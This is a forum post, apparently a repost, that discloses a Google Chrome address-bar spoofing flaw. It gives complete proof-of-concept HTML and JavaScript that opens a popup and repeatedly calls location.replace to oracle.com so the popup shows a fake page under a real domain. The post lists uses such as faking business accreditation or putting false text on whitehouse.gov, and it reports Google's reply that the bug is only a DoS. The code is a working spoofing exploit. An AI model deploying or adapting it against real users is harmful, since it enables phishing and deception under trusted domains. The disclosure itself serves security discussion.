Jump to content
Nytro

Google Chrome Address Spoofing

Recommended Posts

Impact:

The "click to verify" thing is completely broken...

Anyone can be "BBB Accredited Business" etc.

You can make whitehouse.gov display "We love Islamic State" :-)

Note:

No user interaction on the fake page.

Code:

***** index.html

<script>

function next()

{

w.location.replace('http://www.oracle.com/index.html?'+n);n++;

setTimeout("next();",15);

setTimeout("next();",25);

}

function f()

{

w=window.open("content.html","_blank","width=500 height=500");

i=setInterval("try{x=w.location.href;}catch(e){clearInterval(i);n=0;next();}",5);

}

</script>

<a href="#" onclick="f()">Go</a><br>

***** content.html

<b>This web page is NOT oracle.com</b>

<script>location="Oracle | Integrated Cloud Applications and Platform Services";</script>

***** It's online

Deusen - gwhere

(The page says "June/16/2015" - it works as we tested today)

Request For Comment:

We reported this to Google.

They reproduced, and say

It's DoS which doesn't matter.

We think it's very strange,

since the browser does not crash(not DoS),

and the threat is obvious.

What's your opinion?

Kind Regards,

PS

We love clever tricks.

We love this:

Dieyu

  • Upvote 1
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...